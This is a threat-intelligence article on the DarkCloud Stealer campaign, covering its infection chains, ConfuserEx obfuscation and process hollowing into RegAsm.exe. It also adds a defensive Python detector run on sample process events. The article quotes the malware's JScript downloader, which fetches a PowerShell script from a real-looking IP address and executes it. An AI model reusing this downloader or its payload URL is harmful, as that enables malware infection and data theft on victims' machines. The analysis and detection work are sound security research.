DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation

A sophisticated information-stealing malware campaign has emerged, utilizing advanced obfuscation techniques and multiple infection vectors to evade traditional security controls.

The DarkCloud Stealer, first documented in recent threat intelligence reports, represents a significant evolution in cybercriminal tactics, employing a complex multi-stage delivery mechanism that begins with seemingly innocuous archive files and culminates in the deployment of a heavily obfuscated Visual Basic 6 payload.

The malware operators have developed three distinct infection pathways, each designed to maximize the likelihood of successful system compromise.

These include JavaScript-initiated chains that download PowerShell scripts, 7Z archives containing Windows Script Files with obfuscated JScript code, and TAR archives that serve as alternative entry points.

Each vector demonstrates sophisticated social engineering, often masquerading as legitimate business documents or software updates to bypass user suspicion.

Recent campaigns observed since April 2025 indicate the threat actors have significantly refined their approach, moving away from previously documented AutoIt-based implementations toward more complex .NET-based obfuscation frameworks.

Palo Alto Networks researchers identified this shift as part of a broader trend among cybercriminals to adopt enterprise-grade development tools for malicious purposes, making detection and analysis considerably more challenging for security teams.

The malware’s impact extends beyond traditional data theft, incorporating advanced persistence mechanisms and anti-analysis features that allow it to operate undetected for extended periods.

The campaign’s infrastructure, including command-and-control servers hosting multiple malicious PowerShell scripts, suggests a well-resourced operation with significant planning and development investment.

ConfuserEx Obfuscation and Process Injection Mechanics

The technical sophistication of DarkCloud Stealer becomes apparent in its implementation of ConfuserEx-based obfuscation, a legitimate .NET application protector repurposed for malicious use.

[Figure: Infection chain of recent DarkCloud attacks (Source – Palo Alto Networks)]

The malware employs multiple layers of protection including anti-tampering measures, symbol renaming, and control flow obfuscation that transforms readable code into incomprehensible instruction sequences.

The deobfuscated JavaScript downloader reveals the initial infection mechanism:

// Builds a randomly named .ps1 path under C:\Temp (backslashes escaped as JScript requires).
var rDFG = "C:\\Temp\\" + RandomName() + ".ps1";
var fso = new ActiveXObject("Scripting.FileSystemObject");   // file system access for writing the script
var shell = new ActiveXObject("WScript.Shell");              // used to launch PowerShell
var http = new ActiveXObject('MSXML2.XMLHTTP');              // HTTP client for the download

// Dwnld() fetches the remote script into rDFG; ExePSh() runs it via PowerShell (helper bodies are not shown in the excerpt).
if (Dwnld("http://176.65.142.190/Blackyy/kay.ps1", rDFG)) {
    ExePSh(rDFG);
}

This script downloads PowerShell payloads from open directory servers, creating randomly named files in the system’s temporary directory.

The subsequent PowerShell script contains Base64-encoded and AES-encrypted data that, when decrypted, reveals another executable protected by ConfuserEx’s anti-tampering features.

The final stage employs process hollowing, injecting the decrypted VB6 payload named “holographies.exe” into RegAsm.exe, a legitimate .NET Framework utility.

This technique allows the malware to execute within the context of a trusted process, effectively bypassing many endpoint security solutions.
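The two process relationships described above (a script host launching PowerShell on a random .ps1 under C:\Temp, then PowerShell spawning RegAsm.exe with no registration arguments) are what a SOC can hunt for in process-creation telemetry. The following added example is not from the report or from Palo Alto Networks; it runs a small detector over constructed Sysmon-style events, and the file paths, PIDs and the "Vendor" installer are hypothetical sample values.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\invoice.js"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"pid": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\xk3pqv.ps1",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"pid": 4210, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Benign control: RegAsm.exe used for its real purpose by a (hypothetical) installer.
    {"pid": 5000, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r'RegAsm.exe /codebase "C:\Program Files\Vendor\lib.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A .ps1 living directly under any folder named Temp, as the JScript downloader creates it.
TEMP_PS1 = re.compile(r"\\temp\\[^\s'\"]+\.ps1", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) tuples for events that match the DarkCloud delivery chain."""
    hits = []
    for ev in events:
        image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        # Stage 1 -> 2: a Windows script host launching PowerShell on a .ps1 under Temp.
        if image == "powershell.exe" and parent in SCRIPT_HOSTS and TEMP_PS1.search(cmd):
            hits.append(("script_host_to_temp_ps1", ev["pid"]))
        # Stage 3: RegAsm.exe started by PowerShell with no arguments, i.e. no assembly to
        # register, which is consistent with it existing only to host an injected payload.
        if image == "regasm.exe" and parent == "powershell.exe" and len(cmd.split()) == 1:
            hits.append(("powershell_spawns_bare_regasm", ev["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign RegAsm.exe event is deliberately included so the rule only fires on the argument-less, PowerShell-parented case rather than on every RegAsm.exe launch.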

Critical strings within the payload utilize RC4 stream cipher encryption with unique keys, further complicating static analysis efforts and demonstrating the authors’ commitment to evasion.
